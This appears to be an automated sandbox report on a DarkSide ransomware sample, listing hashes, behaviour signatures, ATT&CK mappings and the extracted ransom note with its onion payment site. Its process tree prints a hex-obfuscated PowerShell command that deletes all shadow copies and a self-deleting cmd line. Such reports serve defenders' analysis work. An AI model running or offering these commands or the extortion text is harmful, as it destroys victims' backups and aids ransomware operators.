Overview

overview

10

Static

static

sage2.donotopen.exe

windows7_x64

10

sage2.donotopen.exe

windows10_x64

10

Analysis

  • max time kernel
    26s
  • max time network
    25s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    17-05-2021 14:07

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    sage2.donotopen.exe

  • Size

    59KB

  • MD5

    7be33b01e9cb99c6e23ae3b02f384a2c

  • SHA1

    1f8a236ceafc44eea0c117b9d276d556e3fe53e2

  • SHA256

    b70a184f36903de934b93c5118561ddb1c3747e365575f92682ef09fbb48d5f8

  • SHA512

    c053fe23f5b25127bfe17d7eabad31aa7c3d696d78373e90d8ced9182598c4315fd0cb02aec12efee120996874894a0ef56671d3db4adedfcccb0b80c4b1c154

Score
10/10
darksideransomwarespywarestealer

Malware Config

Extracted

Path

C:\\README.341d6443.TXT

Family

darkside

Ransom Note
----------- [ Welcome to DarkSide ] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/VFBTTQ0UZGCGIMG4WZLMO06HUN6ZQHEF4AY2K88X4GZJQOT106I95CADXOD0MZ39 When you open our website, put the following data in the input form: Key: O8cftGJ1pfLv5lKrmHB1GEA5n66Njf1IoiFZtDyJK7pBiGogpnuyofA8s6BYSOlZa77fma1teaR5FThKb6yVbUwdnRpfC8HAH5y3uyOku71bGSVGSHkW7qL1nVJPNZEeEEpektJpXiq5CDK6sen3WLkcHdSj5fwpGixQ7ytCt4J36QhSfGOCggTXweb3Ccvm2TqZCQQo7io6essoQGcHGFiqiceOVKVBuDq8xYEEODU3bf523VsgLA09gJeK3OkB1A9aWrX8VwwAVhNojxiotck0g0zw6kO6Yyn6zdZtwbCFv6Ny5E73WonoBoWoE8NhX2C6zXRvTogoUEDxfzTquiTRE4ciawueUJWWOqoprwxGqEM7b0ClmYGOMIDQs5xZwnkWLZH97aqBxHmKjGGVcSPts4YtipD4RlaLL5w4F57zcOi0nH8mHoLNA6guOKJSrWC8sGFbm1HUjDmUPxzxhWTg9GBL9cIP6LGorwqmazVcTJkV8JRJ78tFFqr8Ofa4X3ISHdfA3dkgEFWHgeGy2NxVGHSNXnL4fCIW1bKzwhORTrPH00spmCS !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!
URLs

http://darksidfqzcuhtk2.onion/VFBTTQ0UZGCGIMG4WZLMO06HUN6ZQHEF4AY2K88X4GZJQOT106I95CADXOD0MZ39

Signatures

  • DarkSide

    Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.

    ransomwaredarkside
  • Modifies extensions of user files 10 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Deletes itself 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
    ransomware
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Control Panel 1 IoCs
    evasion
  • Modifies registry class 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 24 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe
    "C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe"
    1⤵
    • Modifies extensions of user files
    • Sets desktop wallpaper using registry
    • Modifies Control Panel
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:788
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1616
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C DEL /F /Q C:\Users\Admin\AppData\Local\Temp\SAGE2D~1.EXE >> NUL
      2⤵
      • Deletes itself
      PID:2840
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:1644

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Credentials in Files

1
T1081

Discovery

System Information Discovery

1
T1082

Lateral Movement

Collection

Data from Local System

1
T1005

Exfiltration

Command and Control

Impact

Defacement

1
T1491

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
    MD5

    dab8d891d3796ee132d648b719db343c

    SHA1

    8eab3909265c184a9a26893589836f047591c54c

    SHA256

    7e2ec9da9919c4f541728636bfac5e74405033f0f7e7bd733c3e68d82349f786

    SHA512

    305ca5f6aff09b5d645b5ce1e74b5fe22227fa6d6d70c4ab3dd165b1a140857f929a1727ea341fff063d1dc39756d037d0aac2c10a8ea0f9757ad111edc90d87

    Download Submit
  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    MD5

    5fcb6bbfb6b9dfcc7478f6cfa20f8bf0

    SHA1

    3c0ac7025e2d9aa30ef10a51313d152307f46dd1

    SHA256

    4a2b89babae45fbedb1c4b80f696fbc89a8b13249789647f55c64cbb878e2a64

    SHA512

    be9c5563f3c7430369359dbb7a548d6135773ae49b11047eb8acb7fa5c849e979456c06a49b27dd0a862ef1886930e7ad3e182e265f43e6cf1bca70874b30fed

    Download Submit
  • memory/788-59-0x0000000075551000-0x0000000075553000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1616-66-0x000000001AC14000-0x000000001AC16000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1616-63-0x000000001AC90000-0x000000001AC91000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1616-64-0x0000000002280000-0x0000000002281000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1616-62-0x0000000001ED0000-0x0000000001ED1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1616-65-0x000000001AC10000-0x000000001AC12000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1616-67-0x0000000001F10000-0x0000000001F11000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1616-68-0x000000001C4C0000-0x000000001C4C1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1616-69-0x000000001C590000-0x000000001C591000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1616-61-0x000007FEFBC81000-0x000007FEFBC83000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1616-60-0x0000000000000000-mapping.dmp
    Download
  • memory/2840-72-0x0000000000000000-mapping.dmp
    Download